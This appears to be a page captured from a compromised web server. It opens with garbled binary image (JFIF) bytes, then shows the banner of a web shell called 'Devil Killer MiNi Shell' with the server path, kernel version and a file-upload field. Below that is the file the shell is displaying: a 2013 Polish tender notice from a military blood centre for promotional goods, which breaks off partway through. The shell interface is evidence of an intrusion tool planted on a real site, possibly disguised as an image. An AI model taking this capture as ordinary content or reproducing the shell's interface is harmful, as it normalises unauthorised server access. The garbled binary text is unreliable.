JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130618/233452-N-2013.html

<p class="kh_header"><b>Warszawa: Dostawa materiałów reklamowych</b><br>
<b>Numer ogłoszenia: 233452 - 2013; data zamieszczenia: 18.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa SP ZOZ , ul. Koszykowa 78, 00-671 Warszawa, woj. mazowieckie, tel. 022 6 845 557, faks 022 6 845 135.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wckik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów reklamowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet Nr 1
Parasol automatyczny, druk 4 plus 0 CMYK,  Parasol reklamowy z 8 panelami. Wysokość: min. 90 cm Średnica czaszy: min 100cm. Druty: metalowe (nie łamią się przy składaniu i rozkładaniu), kij: metalowy w kolorze parasola, rączka: PVC w kolorze parasola. Materiał czasza z grubego poliestru Otwieranie zamykanie: automatyczne ręczne Ilość paneli: 8 Kolor czarny, nadruk centralnie na jednym panelu LOGO WCKiK zał. Nr 2 w kolorze białym, ok. 2cm pod logo adres strony internetowej www.wckik.pl w kolorze białym umieszczony 5 cm od krawędzi panelu załącznik Nr 15. Wykonawca zobowiązuje się do przedstawienia 10 rodzajów parasoli, z których Zamawiający wybierze maksymalnie 2 rodzaje. Na wybranym rodzaju parasola Wykonawca wykona logotypy projektu. Każdy parasol pakowany w etui wykonane z przezroczystego plastiku. Projekt graficzny zostanie przygotowany przez Wykonawcę i zatwierdzony przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia 200 sztuk;

Pakiet Nr 2
poz. 1. Długopis dla dawców strzykawka: Długopis w kształcie strzykawki zgodny z załącznikiem Nr 7 o wymiarach 1,10 cm na 12,70 cm z nadrukowaną nazwą Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa oraz adresem strony internetowej www.wckik.pl napis w kolorze czarnym wykonany w sposób zapewniający trwałość podczas użytkowania. Wkład kolor niebieski, środek strzykawki wypełniony czerwoną cieczą imitującą krew, nieszkodliwą dla zdrowia i życia w przypadku uszkodzenia i kontaktu ze skórą człowieka. Użyta ciecz nie może wysychać ani wyparowywać. Długopis musi być wykonany z takiego materiału, aby nie ulegał zepsuciu podczas użytkowania. Projekt graficzny będzie wykonany przez Wykonawcę i przedstawiony do akceptacji. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia 4000 sztuk;
poz. 2. Serce antystresor dla dawców : kolor czerwony, wymiary 7 cm na 6,7 cm na 5,5 cm (plus minus 10%)  materiał poliuretan znakowanie 1 kolor 1 miejsce, metoda znakowania tampodruk, nadruk: www.wckik.pl znajdujący się na środku serca w kolorze białym. Zgodnie z załącznikiem Nr 8. Wielkość nadruku 30 mm na 10 mm. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia 620 sztuk;
poz. 3. Maskotka krwinka brelok :opracowanie , produkcja i dostawa maskotki reklamowej. Wymiary maskotki  breloku 7,5 cm, przedstawiająca krwinkę w kolorze czerwonym, materiał wykonania plusz. Zakończenie z zawieszką do kluczy. Maskotka powinna zawierać adres www.wckik.pl. Maskotka powinna być atrakcyjnym i rozpoznawalnym symbolem, budzącym pozytywne emocje. Projekt graficzny będzie wykonany przez wykonawcę i przedstawiony do akceptacji przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia 600 sztuk;
poz. 4. Bransoletka silikonowa silikonowa opaska na rękę. kolor czerwony 500 szt. kolor zielony 400 sztuk 100 szt. żółty, 100 szt. biały, 100 szt. niebieski, 100 szt. pomarańczowy. Wymiar uniwersalny, materiał 100% silikon, metoda znakowania  tłoczenie: napisy : oddaję  ratuję oraz www.wckik.pl. Każda bransoletka pakowana osobno w foliowe opakowanie. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia  1300 sztuk;
poz. 5. Brelok dla dawców z grupą krwi brelok poliuretanowy z żetonem do wózków na zakupy wymiary żetonu: 2,3 cm, 15mm  na 15mm. Brelok w kolorze czerwonym, awers: na czerwonym tle grupa krwi w kolorze białym, na wierzchu naklejka wypukła: zamieszczona grupa krwi oraz adres strony www.wckik.pl z zawieszką okrągłą na klucze. Nadruk trwały i odporny na ścieranie. Projekt i wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. ARh dodatni 100szt, ARh ujemny 100 szt., ORh dodatni 100 szt., ORh ujemny 100 szt., BRh dodatni 100 szt., BRh ujemny 100szt., Brah dodatni 200szt., Brah ujemny 200szt. Wielkość zamówienia 1000 sztuk;
poz. 6. Długopis dla dawców WCKiK z logo. Długopis automatyczny plastikowy z miękkim uchwytem koloru białego. Napis wykonany w sposób zapewniający trwałość podczas użytkowania: www.wckik.pl. Wkład kolor: niebieski. Projekt graficzny będzie wykonany przez wykonawcę wg wzoru zamawiającego i przedstawiony do akceptacji. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia 5000 sztuk;
poz. 7. Kredki dla dzieci Opis produktu: Komplet 12 drewnianych kredek dł 170 mm do 190 mm na 50 mm do 80 mm w kolorowym kartonowym pudełku. Materiał: drewno. Typ znakowani tampodruk, na pudełku centralnie postać krwinki zgodna z załącznikiem Nr 2b, nazwa WOJSKOWE CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA SPZOZ, oraz adres strony internetowej: www.wckik.pl. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia  50 sztuk;
poz. 8. Kubek z logo Kubek porcelanowy lub inny materiał mający zbliżone właściwości do porcelany. Wysokość:11 mm, Średnica góra 90 mm, dół 5,9 mm. Dopuszczalne odchylenie od wymiarów 5 mm. Pojemność min. 250 ml. Możliwość zmywania w zmywarce. Wykończenie błysk, kolory kubka: czerwony w środku, biały na zewnątrz: dolna część oraz ucho wygodne do trzymania, w kolorze białym. Na kubku musi być logo i napis: WOJSKOWE CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA SPZOZ, na części dolnej 1,5 cm od dołu kubka napis www.wckik.pl załącznik Nr 14, po przeciwnej części kubka postać krwinki, wg. załącznika Nr 2b. Każdy kubek pakowany osobno w karton. Projekt graficzny będzie wykonany przez Wykonawcę wg wytycznych Zamawiającego i przedstawiony do akceptacji. Wykonanie nastąpi po akceptacji przez Zamawiającego.   Wielkość zamówienia  500 sztuk;
poz. 9. Pendrive Pamięć USB 4 GB, obudowa plastik aluminium, logo na obudowie wg. załącznika Nr 2 znakowanie tampodruk. Każdy pendrive zapakowany osobno w pudełko. Projekt graficzny będzie wykonany przez Wykonawcę i przedstawiony do akceptacji Zamawiającego. Wykonanie nastąpi po akceptacji przez Zamawiającego.   Wielkość zamówienia  270 sztuk;

Pakiet Nr 3
Reklamówki z logo  Torba reklamowa typu market kolor folii biały nieprzeźroczysty, wycięty otwór umożliwiający przenoszenie, wzmocniony podklejką, bez zakładki dolnej, logo i napisy WCKiK kolor srebrny, nadruk fleksograficzny. Rozmiar: 35cm na 45cm. Folia LDPE o grubości 55 mikronów, jednolity kolor nadruku. Rozmieszczenie treści nadruku: Środek: Logo WCKiK SPZOZ zgodnie z załącznikiem Nr 2. Poniżej logo WCKiK treść wyśrodkowana: WOJSKOWE CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA SPZOZ Na samym dole treść: www.wckik.pl. Wykonanie nastąpi po akceptacji przez Zamawiającego.  Wielkość zamówienia  6000 sztuk;

Pakiet Nr 4
Słodycze reklamowe  krówki ciągutki o smaku mlecznym, zawinięte w podkładkę parafinową oraz etykietę z nadrukiem reklamowym 4 plus 0 zgodnym z załącznikiem Nr 10, waga cukierka ok. 12g. (plus minus 1,5g), format 70 na 21 na 12 mm, ilość sztuk w kilogramie od 75 sztuk do 85 szt. okres przydatności do spożycia od momentu dostawy 6 miesięcy, skład cukier, tłuszcz roślinny, syrop glukozowy, mleko w proszku. Wykonanie produktu nastąpi po zaakceptowaniu przez zamawiającego. Krówki pakowane w opakowanie zbiorcze po 5 kg. Na opakowaniach informacja o składnikach, producencie i terminie przydatności do spożycia. Wykonanie nastąpi po całkowitej akceptacji przez zamawiającego. Wielkość zamówienia 100 kg

Pakiet Nr 5
poz. 1. Ryngraf WCKiK Podkład deski wykonany z drewna w kolorze mahoń, struktura gładka, zgodny z załącznikiem Nr 12: Próbki drewna przesłana do akceptacji Zamawiającego. Wymiar plus minus 10%, wys. 17,5 cmx grubość 1,6 cm.. Z tyłu podkładu otwór do mocowania na ścianie. Na podkładzie wykonany z metalu w kształcie wstęgi i przytwierdzony trwale napis WOJSKOWE CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA SPZOZ zał Nr 12, pod wstęgą centralnie na ryngrafie kolorowe logo zgodne z załącznikiem Nr 2 w proporcjach 1do3 wielkości deski. Każdy ryngraf pakowany w karton. Projekt graficzny będzie wykonany przez Wykonawcę wg wzoru Zamawiającego i przedstawiony do akceptacji Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia  30 sztuk;
poz. 2. Etui na ryngraf Wykonanie etui do ryngrafu WCKiK. Wymiary ryngrafu wysokość 17,5 cm, szerokość 14,5 cm. Kształt ryngrafu zgodny z zał. Nr 13. Wierzch etui z tworzywa introligatorskiego narożniki z metalu. W środku materiałowa wyściółka. Kolor etui zostanie wybrany po przedstawieniu przez Wykonawcę 5 wzorów. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia  30 sztuk;

Pakiet Nr 6
Balon z logo. Balon 11 cali (88 cm obwodu) w kolorze białym postacią krwinki zaproponowaną przez Wykonawcę oraz napisem  www.wckik.pl. Wielkość krwinki po nadmuchaniu balonu powinna wynosić min 7cm. Do każdego balonu dodatkowo: patyczek i uchwyt do przyczepienia balonu. Nadruk odporny na ścieranie Projekt graficzny będzie wykonany przez Wykonawcę wg wzoru Zamawiającego Załącznik Nr 2b i przedstawiony do akceptacji. Wykonanie nastąpi po akceptacji przez Zamawiającego. Wielkość zamówienia  200 sztuk;

Pakiet Nr 7
poz. 1. Stojak na ulotki  Podstawa metalowa z drewnianą obudową o 380 mm. Profil aluminiowy wysokości 1000 mm. Z kieszeniami z plexi 3 na A4 z możliwością dzielenia. Wykonanie nastąpi po akceptacji przez Zamawiającego.  Wielkość zamówienia  2 sztuki;
poz. 2. Wstążka flaga  wstęga rypsowa w kolorze białoczerwonym wykorzystywana do przecięcia podczas uroczystości otwarcia np. budynku. Szerokość 10cm plus minus 1 cm długość 6 m. Wykonanie nastąpi po akceptacji przez Zamawiającego.  Wielkość zamówienia  9 m.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 15.84.23.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w razie zaistnienia okoliczności:
1) wydanie decyzji administracyjnej przez organ nadzoru budowlanego lub ochrony środowiska o wstrzymaniu robót w wyniku interwencji obywatela lub organizacji społecznej;
2) wystąpienie nieprzewidzianych zjawisk atmosferycznych, (np.: wichury, ulewy, śnieżyce, gradobicie) mogących spowodować zniszczenie robót lub konieczność wstrzymania robót ze względu na zachowanie reżimów technologicznych (temperatura, wilgotność);
3) w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące powstaniem szkody niewspółmiernie większej niż spowodowana działaniem lub zaniechaniem;
4) zaistnienie sytuacji pozwalającej na obniżenie kosztów realizacji zamówienia (np. zmniejszenie zakresu robót lub czynności, zastosowania alternatywnych rozwiązań technologicznych);
5) zaistnienie konieczności wykonania robót zamiennych;
6) wystąpienia innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny;
7) zmiana w zakresie przedmiotu zamówienia w przypadku wystąpienia okoliczności, których nie dało się przewidzieć w chwili podpisania umowy, niezależnych od wykonawcy;
8) zmiana terminu realizacji umowy w przypadku wystąpienia okoliczności nieleżących po stronie wykonawcy;
9) ustawowej zmiany stawki podatku od towarów i usług VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wckik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa
Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Koszykowa 78
00-671 Warszawa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2013 godzina 09:00, miejsce: Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa
Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Koszykowa 78
00-671 Warszawa 1
Kancelaria ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Parasol automatyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Parasol automatyczny, druk 4 plus 0 CMYK,  Parasol reklamowy z 8 panelami. Wysokość: min. 90 cm Średnica czaszy: min 100cm. Druty: metalowe (nie łamią się przy składaniu i rozkładaniu), kij: metalowy w kolorze parasola, rączka: PVC w kolorze parasola. Materiał czasza z grubego poliestru Otwieranie zamykanie: automatyczne ręczne Ilość paneli: 8 Kolor czarny, nadruk centralnie na jednym panelu LOGO WCKiK zał. Nr 2 w kolorze białym, ok. 2cm pod logo adres strony internetowej www.wckik.pl w kolorze białym umieszczony 5 cm od krawędzi panelu załącznik Nr 15. Wykonawca zobowiązuje się do przedstawienia 10 rodzajów parasoli, z których Zamawiający wybierze maksymalnie 2 rodzaje. Na wybranym rodzaju parasola Wykonawca wykona logotypy projektu. Każdy parasol pakowany w etui wykonane z przezroczystego plastiku. Projekt graficzny zostanie przygotowany przez Wykonawcę i zatwierdzony przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia 200 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Materiały reklamowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> poz. 1. Długopis dla dawców strzykawka: Długopis w kształcie strzykawki zgodny z załącznikiem Nr 7 o wymiarach 1,10 cm na 12,70 cm z nadrukowaną nazwą Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa oraz adresem strony internetowej www.wckik.pl napis w kolorze czarnym wykonany w sposób zapewniający trwałość podczas użytkowania. Wkład kolor niebieski, środek strzykawki wypełniony czerwoną cieczą imitującą krew, nieszkodliwą dla zdrowia i życia w przypadku uszkodzenia i kontaktu ze skórą człowieka. Użyta ciecz nie może wysychać ani wyparowywać. Długopis musi być wykonany z takiego materiału, aby nie ulegał zepsuciu podczas użytkowania. Projekt graficzny będzie wykonany przez Wykonawcę i przedstawiony do akceptacji. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia 4000 sztuk;
poz. 2. Serce antystresor dla dawców : kolor czerwony, wymiary 7 cm na 6,7 cm na 5,5 cm (plus minus 10%)  materiał poliuretan znakowanie 1 kolor 1 miejsce, metoda znakowania tampodruk, nadruk: www.wckik.pl znajdujący się na środku serca w kolorze białym. Zgodnie z załącznikiem Nr 8. Wielkość nadruku 30 mm na 10 mm. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia 620 sztuk;
poz. 3. Maskotka krwinka brelok :opracowanie , produkcja i dostawa maskotki reklamowej. Wymiary maskotki  breloku 7,5 cm, przedstawiająca krwinkę w kolorze czerwonym, materiał wykonania plusz. Zakończenie z zawieszką do kluczy. Maskotka powinna zawierać adres www.wckik.pl. Maskotka powinna być atrakcyjnym i rozpoznawalnym symbolem, budzącym pozytywne emocje. Projekt graficzny będzie wykonany przez wykonawcę i przedstawiony do akceptacji przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia 600 sztuk;
poz. 4. Bransoletka silikonowa silikonowa opaska na rękę. kolor czerwony 500 szt. kolor zielony 400 sztuk 100 szt. żółty, 100 szt. biały, 100 szt. niebieski, 100 szt. pomarańczowy. Wymiar uniwersalny, materiał 100% silikon, metoda znakowania  tłoczenie: napisy : oddaję  ratuję oraz www.wckik.pl. Każda bransoletka pakowana osobno w foliowe opakowanie. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia  1300 sztuk;
